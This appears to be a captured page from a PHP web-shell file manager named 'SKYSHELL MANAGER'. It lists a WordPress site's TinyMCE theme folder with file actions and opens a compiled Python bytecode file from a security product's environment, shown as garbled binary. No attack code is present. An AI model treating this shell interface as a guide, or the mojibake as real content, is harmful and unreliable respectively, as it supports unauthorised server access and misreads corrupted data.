📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: pidfile.cpython-311.pyc
� ��]j� � �D � d Z ddlmZmZ ddlmZ G d� dee� � ZdS )z8 Lockfile behaviour implemented via Unix PID files. � )�absolute_import�unicode_literals)�PIDLockFilec �0 � � e Zd ZdZd� fd� Zd� fd� Z� xZS )�TimeoutPIDLockFilea@ Lockfile with default timeout, implemented as a Unix PID file. This uses the ``PIDLockFile`` implementation, with the following changes: * The `acquire_timeout` parameter to the initialiser will be used as the default `timeout` parameter for the `acquire` method. Nc �P �� || _ t � � j |g|�R i |�� dS )z� Set up the parameters of a TimeoutPIDLockFile. :param path: Filesystem path to the PID file. :param acquire_timeout: Value to use by default for the `acquire` call. :return: ``None``. N)�acquire_timeout�super�__init__)�self�pathr �args�kwargs� __class__s ��E/opt/imunify360/venv/lib64/python3.11/site-packages/daemon/pidfile.pyr zTimeoutPIDLockFile.__init__ s: �� � /���������/��/�/�/��/�/�/�/�/� c �T �� |�| j } t � � j |g|�R i |�� dS )ax Acquire the lock. :param timeout: Specifies the timeout; see below for valid values. :return: ``None``. The `timeout` defaults to the value set during initialisation with the `acquire_timeout` parameter. It is passed to `PIDLockFile.acquire`; see that method for details. N)r r �acquire)r �timeoutr r r s �r r zTimeoutPIDLockFile.acquire* s>